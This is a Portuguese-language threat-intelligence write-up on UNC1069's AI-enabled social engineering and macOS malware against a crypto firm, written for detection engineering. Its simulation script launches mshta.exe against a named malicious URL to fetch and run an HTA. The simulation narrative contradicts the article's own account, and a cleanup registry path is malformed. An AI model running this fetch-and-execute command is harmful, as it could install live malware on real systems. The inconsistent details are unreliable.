SOC Prime Bias: Crítico

11 Fev 2026 18:03

UNC1069 Mira o Setor de Criptomoeda com Novas Ferramentas e Engenharia Social Habilitada por IA

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
UNC1069 Mira o Setor de Criptomoeda com Novas Ferramentas e Engenharia Social Habilitada por IA
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Relacionado à Coreia do Norte, o grupo UNC1069 atacou uma FinTech de criptomoedas usando uma intrusão em várias etapas que combinou vídeo deepfake gerado por IA, contas Telegram comprometidas e uma reunião Zoom falsa para levar as vítimas a executar comandos maliciosos.

Investigação

A Mandiant identificou sete famílias de malware em um host macOS, incluindo os recém-observados SILENCELIFT, DEEPBREATH e CHROMEPUSH, além do carregador conhecido SUGARLOADER. A cadeia começou com um comando estilo ClickFix que buscou uma carga útil de um domínio malicioso, e então passou por carregadores e backdoors que roubaram credenciais, dados do navegador e conteúdo de mensagens. Estágios posteriores utilizaram execução modular, residente em memória, para minimizar rastros em disco.

Mitigação

Fortaleça a verificação através de canais de engenharia social, restrinja a execução de scripts não assinados e monitore o uso anômalo de curl ou mshta. No macOS, aplique controles de assinatura de código e de launch-daemon, e audite permissões TCC e diretórios de hosts de mensagens nativas para arquivos desconhecidos.

Resposta

Isole o endpoint, preserve artefatos de linha de comando, recupere o plist do launch-daemon malicioso e bloqueie todos os domínios C2 identificados. Redefina credenciais do chaveiro, navegador e Telegram, e complete uma varredura por carregadores residuais. Revise contas afetadas para acesso não autorizado e coordene a contenção.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>Ação</b> – <b>T1204.001 Execução do Usuário</b>: Link malicioso entregue via conta comprometida do Telegram e reunião Zoom falsificada<br/><b>Descrição</b>: A vítima copiou e executou strings de comando"] class action_initial_access action tool_telegram["<b>Ferramenta</b> – <b>Nome</b>: Telegram (comprometido)<br/><b>Função</b>: Canal de entrega para link malicioso"] class tool_telegram tool tool_zoom["<b>Ferramenta</b> – <b>Nome</b>: Zoom (reunião falsificada)<br/><b>Função</b>: Vetor de engenharia social"] class tool_zoom tool action_execution_unix_shell["<b>Ação</b> – <b>T1059.004 Shell Unix</b>: Execute o comando curl via zsh para baixar WAVESHAPER<br/><b>Descrição</b>: Baixa e executa backdoor"] class action_execution_unix_shell action tool_curl["<b>Ferramenta</b> – <b>Nome</b>: curl<br/><b>Propósito</b>: Recuperar carga útil remota"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Nome</b>: WAVESHAPER<br/><b>Função</b>: Backdoor baixado e executado"] class malware_waveshaper malware action_execution_mshta["<b>Ação</b> – <b>T1218.005 Execução Proxy Mshta</b>: Use mshta para recuperar e executar o downloader HYPERCALL"] class action_execution_mshta action tool_mshta["<b>Ferramenta</b> – <b>Nome</b>: mshta<br/><b>Propósito</b>: Executar aplicação HTML remota"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Nome</b>: HYPERCALL<br/><b>Função</b>: Downloader executado via mshta"] class malware_hypercall malware process_launch_daemon["<b>Processo</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>Propósito</b>: Executa SUGARLOADER na inicialização do sistema"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Nome</b>: SUGARLOADER<br/><b>Função</b>: Componente persistente"] class malware_sugarloader malware action_defense_evasion["<b>Ação</b> – <b>T1027.004 Compilação Após Entrega</b>: Criptografe configuração com RC4 para ocultar URLs C2"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Nome</b>: DEEPBREATH<br/><b>Capacidades</b>: Acesso a Keychain e armazenamentos de navegador"] class malware_deepbreath malware action_cred_keychain["<b>Ação</b> – <b>T1555.001 Keychain</b>: Extraia credenciais do Keychain do macOS"] class action_cred_keychain action action_cred_browser["<b>Ação</b> – <b>T1555.003 Navegadores Web</b>: Extraia cookies, logins, extensões do Chrome Brave Edge"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Nome</b>: CHROMEPUSH<br/><b>Capacidade</b>: Keylogger de extensão de navegador"] class malware_chromepush malware action_keylogging["<b>Ação</b> – <b>T1056.001 Keylogging</b>: Capturar pressionamentos de tecla via extensão maliciosa"] class action_keylogging action action_local_staging["<b>Ação</b> – <b>T1074.001 Estágio de Dados Locais</b>: Armazene dados coletados em diretórios temporários"] class action_local_staging action action_remote_staging["<b>Ação</b> – <b>T1074.002 Estágio de Dados Remotos</b>: Carregue dados preparados para C2 usando curl"] class action_remote_staging action action_c2_http["<b>Ação</b> – <b>T1102.003 Serviço Web One-Way</b>: Envie dados exfiltrados via HTTP POST"] class action_c2_http action action_exfiltration["<b>Ação</b> – <b>T1020 Exfiltração Automatizada</b>: Carregamento automatizado de dados para servidores C2"] class action_exfiltration action %% Connections action_initial_access –>|utiliza| tool_telegram tool_telegram –>|entrega link para| tool_zoom tool_zoom –>|leva a| action_execution_unix_shell action_execution_unix_shell –>|executa| tool_curl tool_curl –>|baixa| malware_waveshaper malware_waveshaper –>|dispara| action_defense_evasion action_initial_access –>|também dispara| action_execution_mshta action_execution_mshta –>|utiliza| tool_mshta tool_mshta –>|recupera| malware_hypercall malware_hypercall –>|instala| process_launch_daemon process_launch_daemon –>|inicia| malware_sugarloader malware_sugarloader –>|carrega| malware_deepbreath malware_deepbreath –>|executa| action_cred_keychain malware_deepbreath –>|executa| action_cred_browser malware_deepbreath –>|instala| malware_chromepush malware_chromepush –>|executa| action_keylogging action_keylogging –>|armazena dados em| action_local_staging action_local_staging –>|carrega via curl para| action_remote_staging action_remote_staging –>|envia dados para| action_c2_http action_c2_http –>|facilita| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A verificação prévia de Telemetria & Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos do Ataque:
    O adversário, após obter acesso inicial via um email de phishing, utiliza mshta para buscar uma Aplicação HTML maliciosa de https://mylingocoin.com/audio/fix/6454694440. Este arquivo HTA contém uma carga útil do PowerShell que instala um minerador de criptomoedas. Antes de lançar o HTA, o atacante executa setx audio_volume 100 para garantir que o subsistema de áudio esteja em um estado conhecido (algumas variantes da campanha ClickFix manipulam configurações de áudio para ocultar pop-ups). Ambos os comandos são executados diretamente em um console PowerShell, produzindo campos CommandLine que correspondem exatamente à regra Sigma.

  • Script de Teste de Regressão:

    # Simulação de Ataque ClickFix de UNC1069 – aciona regra Sigma
    # Etapa 1: Persista uma variável de ambiente com aparência inofensiva (corresponde à detecção)
    setx audio_volume 100
    
    # Etapa 2: Execute HTA malicioso – URL exato usado na detecção da regra
    $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440"
    Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl
    
    # Opcional: aguarde alguns segundos para o HTA iniciar
    Start-Sleep -Seconds 5
  • Comandos de Limpeza:

    # Remova a variável de ambiente definida anteriormente
    reg delete "HKCUEnvironment" /v "audio_volume" /f
    
    # Termine quaisquer processos mshta restantes gerados pelo teste
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force